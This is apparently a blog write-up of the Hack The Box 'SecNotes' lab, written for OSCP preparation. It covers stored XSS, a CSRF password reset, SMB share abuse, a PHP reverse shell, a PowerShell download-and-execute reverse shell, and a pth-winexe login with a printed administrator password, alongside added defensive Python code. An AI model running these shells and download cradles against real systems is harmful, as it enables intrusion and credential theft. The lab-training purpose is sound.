Joshua Surendran

Nov 7, 2020

9 min read

Hack The Box: SecNotes Write-up (#28)

This is my 28th box out of 42 boxes for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and the services running on them.

./nmapAutomator 10.10.10.97 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get back the following result:

---------------------Starting Nmap Quick Scan---------------------
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h20m01s, deviation: 4h02m31s, median: 0s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2020-10-14T03:13:52-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-14T10:13:53
|_ start_date: N/A
---------------------Starting Nmap Basic Scan---------------------
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 04:59 +08
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h40m18s, deviation: 4h37m09s, median: 16s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2020-11-06T13:00:09-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-06T21:00:06
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.63 seconds
----------------------Starting Nmap UDP Scan----------------------
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 05:00 +08
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up.
All 1000 scanned ports on secnotes.htb (10.10.10.97) are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.50 seconds
---------------------Starting Nmap Full Scan----------------------
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 05:03 +08
Initiating SYN Stealth Scan at 05:03
Scanning secnotes.htb (10.10.10.97) [65535 ports]
Discovered open port 80/tcp on 10.10.10.97
Discovered open port 445/tcp on 10.10.10.97
SYN Stealth Scan Timing: About 11.65% done; ETC: 05:08 (0:03:55 remaining)
SYN Stealth Scan Timing: About 23.08% done; ETC: 05:08 (0:03:23 remaining)
SYN Stealth Scan Timing: About 34.51% done; ETC: 05:08 (0:02:53 remaining)
SYN Stealth Scan Timing: About 45.93% done; ETC: 05:08 (0:02:22 remaining)
SYN Stealth Scan Timing: About 57.36% done; ETC: 05:08 (0:01:52 remaining)
SYN Stealth Scan Timing: About 68.65% done; ETC: 05:08 (0:01:23 remaining)
SYN Stealth Scan Timing: About 80.21% done; ETC: 05:08 (0:00:52 remaining)
Discovered open port 8808/tcp on 10.10.10.97
Completed SYN Stealth Scan at 05:08, 262.70s elapsed (65535 total ports)
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.10s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
8808/tcp open ssports-bcast
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.80 seconds

We have 3 ports open.

  • Port 80: running HTTP, Microsoft IIS httpd 10.0
  • Port 445: running Samba (microsoft-ds)
  • Port 8808: running HTTP, Microsoft IIS httpd 10.0
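Before reading the scan by hand, it helps to have a small triage helper. The Python below is an added example, not part of the original write-up or of nmapAutomator: it parses nmap normal output of the kind shown above into a list of open ports and flags the findings a defender would act on first, SMB message signing not enforced and the HTTP TRACE method enabled. The sample text is constructed to mirror the scan above, and the function names are my own.

```python
import re

# Constructed sample modelled on the nmap output above (not the page's exact text).
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open ssports-bcast
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|_ Message signing enabled but not required
"""

# port/proto  state  service  [version...]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_open_ports(text):
    """Return one dict per open port found in nmap normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "service": m.group(4),
                "version": (m.group(5) or "").strip(),
            })
    return ports


def find_weak_settings(text):
    """Flag script-output lines that indicate a weak configuration."""
    findings = []
    lowered = text.lower()
    if "message_signing: disabled" in lowered:
        findings.append("SMB1 message signing disabled: traffic can be tampered with or relayed")
    if "message signing enabled but not required" in lowered:
        findings.append("SMB2 signing not required: relay attacks remain possible")
    if re.search(r"potentially risky methods:.*\btrace\b", lowered):
        findings.append("HTTP TRACE enabled: disable it on the IIS site")
    return findings


if __name__ == "__main__":
    for p in parse_open_ports(SAMPLE_NMAP):
        print(f"{p['port']}/{p['proto']} {p['service']} {p['version']}")
    for f in find_weak_settings(SAMPLE_NMAP):
        print("!", f)
```

Feed it a real `-oN` file instead of the constructed sample and the port list doubles as the input for a change-tracking diff between scans of the same host.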

Before we begin, let’s make quick mental notes.

  • Port 80 is likely our initial foothold. We enumerate the pages and look for hidden directories holding sensitive information or an admin login page.
  • A Samba share is often mapped to the web root in setups with more than one HTTP service. Since we have an additional HTTP service on port 8808, this could possibly be used for file upload and LFI.

Service Enumeration

Visit the page.

We have a login page. I tried common and weak credentials, but none of them works. I also tested for SQL injection, but the form is not vulnerable. The only option left is to sign up for an account.

While signing up for a new account, the password policy is leaked: a minimum length of 6 characters is required. I created an account with the credentials admin/admin1. Let’s log in.

We are successfully logged in as the admin user. Here we see an internal user, Tyler, and the domain secnotes.htb. Take note of that. Additionally, we have 4 functionalities here. Let’s test 3 of them.

1. New Note

Let’s test for a cross-site scripting (XSS) vulnerability.

Set up a netcat listener on your Kali Linux on port 80 and click Save on the above page.

We get a request carrying the session cookie. This is stored XSS: every time I refreshed the page, it sent another request to my netcat listener. So the Note field is vulnerable to stored XSS. It is not useful in this case, though, unless a user with admin privileges logs in, so that we can steal their cookie and authenticate to the page.

2. Change Password

Let’s change the password to admin2 and observe the request and message body in Burp.

On a successful password change, it redirects us to the home.php page.

3. Contact Us

Here we can send a message to Tyler. Let’s put a link to our web server in the message field and watch for it on the netcat listener on our Kali Linux.

We get an incoming request and a Message Sent notification.

What does this tell us? Any link we send through this message field is opened by Tyler. Great! Let’s turn this into an initial foothold.

We copy the request from the Change Password functionality and send it to Tyler via the Contact Us form as a GET request:

http://10.10.10.97/change_pass.php?password=admin1&confirm_password=admin1&submit=submit

Once done, we should see the Message Sent notification as we did earlier in this write-up.
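Two application weaknesses drive this foothold: notes are rendered without output encoding (the stored XSS under New Note), and change_pass.php performs a state change for any request that carries the session cookie, even a GET link opened from the Contact Us message. The Python below is an added example, not code from the box or from this write-up: it models the weak password-change handler beside a hardened one (POST only, per-session CSRF token, re-authentication with the current password, the 6-character minimum the signup page enforces), plus output encoding for notes and the cookie flags that blunt both attacks. The in-memory stores, function names and the cookie name `session` are assumptions for the demo.

```python
import hashlib
import hmac
import html
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory user and session stores standing in for the app's database.
USERS = {}
SESSIONS = {}


def _hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def reset_demo(user="tyler", password="old-password", cookie="sess-demo"):
    """Populate one user and one logged-in session; returns the session's CSRF token."""
    salt = secrets.token_bytes(16)
    USERS.clear()
    SESSIONS.clear()
    USERS[user] = {"salt": salt, "hash": _hash_password(password, salt)}
    SESSIONS[cookie] = {"user": user, "csrf": secrets.token_hex(16)}
    return SESSIONS[cookie]["csrf"]


def verify_password(user, candidate):
    rec = USERS[user]
    return hmac.compare_digest(rec["hash"], _hash_password(candidate, rec["salt"]))


def weak_change_pass(method, url, cookie):
    """The behaviour the write-up abuses: the session cookie is the only check and the
    HTTP method is ignored, so a GET link opened by the victim changes their password."""
    session = SESSIONS.get(cookie)
    if session is None:
        return 401, "login required"
    q = parse_qs(urlsplit(url).query)
    pw = q.get("password", [""])[0]
    if pw and pw == q.get("confirm_password", [""])[0]:
        salt = secrets.token_bytes(16)
        USERS[session["user"]] = {"salt": salt, "hash": _hash_password(pw, salt)}
        return 302, "/home.php"
    return 400, "passwords do not match"


def hardened_change_pass(method, cookie, form):
    """Same operation with the controls the weak version lacks."""
    session = SESSIONS.get(cookie)
    if session is None:
        return 401, "login required"
    if method != "POST":                       # state changes never ride on GET links
        return 405, "method not allowed"
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf"]):
        return 403, "bad csrf token"           # only the genuine form carries the token
    user = session["user"]
    if not verify_password(user, form.get("current_password", "")):
        return 403, "current password incorrect"   # re-authenticate for a sensitive change
    pw = form.get("password", "")
    if len(pw) < 6 or pw != form.get("confirm_password", ""):
        return 400, "password too short or mismatch"
    salt = secrets.token_bytes(16)
    USERS[user] = {"salt": salt, "hash": _hash_password(pw, salt)}
    return 302, "/home.php"


def render_note(note_text):
    """Output-encode note content so a stored <script> is shown as text, not run."""
    return '<div class="note">' + html.escape(note_text, quote=True) + "</div>"


def session_cookie_header(cookie):
    """HttpOnly keeps script from reading the cookie; SameSite=Strict keeps the browser
    from attaching it to cross-site navigations such as a link clicked from a message."""
    return f"Set-Cookie: session={cookie}; HttpOnly; Secure; SameSite=Strict"


if __name__ == "__main__":
    link = "http://10.10.10.97/change_pass.php?password=admin1&confirm_password=admin1&submit=submit"
    reset_demo()
    print("weak handler on GET link:", weak_change_pass("GET", link, "sess-demo"))
    reset_demo()
    print("hardened handler on GET link:", hardened_change_pass("GET", "sess-demo", {}))
    print(render_note("<script>alert(1)</script>"))
    print(session_cookie_header("sess-demo"))
```

Each control on its own closes a different path: POST-only stops the plain link, the token stops a forged POST, re-authentication limits damage from a stolen session, and the cookie flags make the stolen-cookie and forged-request scenarios harder in the first place.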

Let’s log in with the credentials Tyler / admin1.

We are in! After checking each note, under "new site" we find Samba share credentials for the user Tyler.

Let’s list the shares with the tyler/92g!mA8BGjOirkL%OG*& credentials.

Let’s check the permissions on the new-site share.

We have full permissions! Now we mount this share locally on our Kali Linux and check the contents.

Create a new directory in the current working directory and mount the share on it with the following command.

root@kali:/htb/SecNotes# mkdir share
root@kali:/htb/SecNotes# mount -t cifs -o user=tyler,domain=secnotes.htb //10.10.10.97/new-site share/

When prompted for a password, enter Tyler’s password. Verify the share has mounted successfully with the df command.

Now change into the mount point share/ and list the contents.

root@kali:/htb/SecNotes/share# ls -ltr
total 104
-rwxr-xr-x 1 root root 98757 Jun 21 2018 iisstart.png
-rwxr-xr-x 1 root root 696 Jun 21 2018 iisstart.htm

These are the default IIS start page files (iisstart.htm and its image) for the new site running on port 8808.

Exploitation

Now generate an msfvenom reverse shell payload in the current directory (the mounted share, which is the web root of the site on port 8808). We know the web server supports PHP, so we generate a PHP payload.

msfvenom -p php/reverse_php LHOST=10.10.14.50 LPORT=4444 -o reverse.php

Set up a netcat listener on your Kali Linux.

nc -nlvp 4444

Call this reverse.php payload from the browser.

http://10.10.10.97:8808/reverse.php

We got a reverse shell! But this shell is not stable, so we need a better one. For this, let’s use a Nishang script to get a new shell.

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

cp ../../opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with your Kali Linux machine’s settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.50 -Port 4445

When called, this sends a reverse shell back to our Kali Linux on port 4445.

Set up a netcat listener on Kali Linux.

nc -nlvp 4445

Start a web server in the directory where shell.ps1 is placed.

python3 -m http.server 80

Run the command below from your first reverse shell.

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.50/shell.ps1')"

Go back to your listener and check whether we get a shell.

We have a shell again! We are in the context of user Tyler. Let’s grab the user.txt flag.

Download the winPEAS privilege escalation script from here and transfer it to the target machine.

Run the script.

.\winPEAS.exe

After reviewing the output, the password files info section caught my attention.

A quick Google search for “…\canonicalgrouplimited.ubuntu18.04onwindows_79rhkp1fndgsc\localstate\rootfs” shows that it is an Ubuntu distribution package for the Windows Subsystem for Linux, which can be installed alongside Windows. This path is where the distribution’s root filesystem is installed. After spending some time enumerating the path “…\canonicalgrouplimited.ubuntu18.04onwindows_79rhkp1fndgsc\localstate\rootfs/root/”, I found a .bash_history file.

bash_history files often contain previously run commands and, with them, sensitive information such as credentials. Let’s check that file.
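This is exactly the kind of leak a periodic audit should catch before an attacker does. The Python below is an added example, not the write-up’s own tooling: it scans shell history text for commands that carry inline credentials (user%password arguments to SMB tools, password= mount options, basic-auth flags, exported secrets) and reports them with the secret redacted, and it lists the history files under a Linux root such as a WSL rootfs so the same check can be run over every user. The sample history is constructed with placeholder secrets, not the box’s values.

```python
import re
from pathlib import Path

# Constructed sample shell history; the secrets are placeholders, not values from the box.
SAMPLE_HISTORY = """\
ls -la
smbclient -U administrator%Placeholder1! //10.10.10.97/new-site
mount -t cifs -o user=tyler,password=Placeholder2 //10.10.10.97/new-site /mnt/share
curl -u svc:Placeholder3 https://internal.example/api
export DB_PASSWORD=Placeholder4
cat /etc/hostname
"""

# Each pattern's last capture group is the secret, so the report can redact it.
CREDENTIAL_PATTERNS = [
    ("smb user%pass", re.compile(r"-U\s+'?([^\s'%]+)%([^\s']+)'?")),
    ("mount option", re.compile(r"\bpassword=([^,\s]+)")),
    ("curl basic auth", re.compile(r"\bcurl\b.*?-u\s+'?([^\s':]+):([^\s']+)'?")),
    ("exported secret", re.compile(r"\bexport\s+\w*(?:PASS|PASSWORD|SECRET|TOKEN)\w*=(\S+)", re.I)),
]


def scan_history(text):
    """Return (line_no, kind, redacted_line) for each history line carrying a credential."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for kind, pattern in CREDENTIAL_PATTERNS:
            m = pattern.search(line)
            if m:
                secret = m.group(m.lastindex)        # last group is always the secret
                hits.append((no, kind, line.replace(secret, "<REDACTED>")))
                break                                # one finding per line is enough
    return hits


def history_files(rootfs):
    """Candidate shell history files under a Linux root (for example a WSL rootfs).
    Returns an empty list when the path does not exist, so it is safe to call anywhere."""
    root = Path(rootfs)
    patterns = ("root/.*_history", "home/*/.*_history")
    return [p for pat in patterns for p in root.glob(pat)]


if __name__ == "__main__":
    for no, kind, redacted in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {kind}: {redacted}")
    # Assumed path for illustration; pass the real rootfs directory on an audited host.
    for path in history_files("/mnt/wsl-rootfs"):
        for no, kind, redacted in scan_history(path.read_text(errors="replace")):
            print(f"{path}:{no}: {kind}: {redacted}")
```

The fix for each hit is the same: rotate the credential, then remove the need for it on the command line (credential files with tight permissions, or HISTCONTROL and a leading space for one-off commands).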

We can see that the administrator credentials were used to access a Samba share. Let’s use them to escalate privileges with pth-winexe (the pass-the-hash tool, here supplied with the plaintext password).

From Kali Linux, run the command below.

pth-winexe -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe

We are an Administrator! Grab the root.txt flag.

Attack Strategy Map

I have summarized the entire attack strategy in this map.

Thank you for reading :-) Next box is Legacy.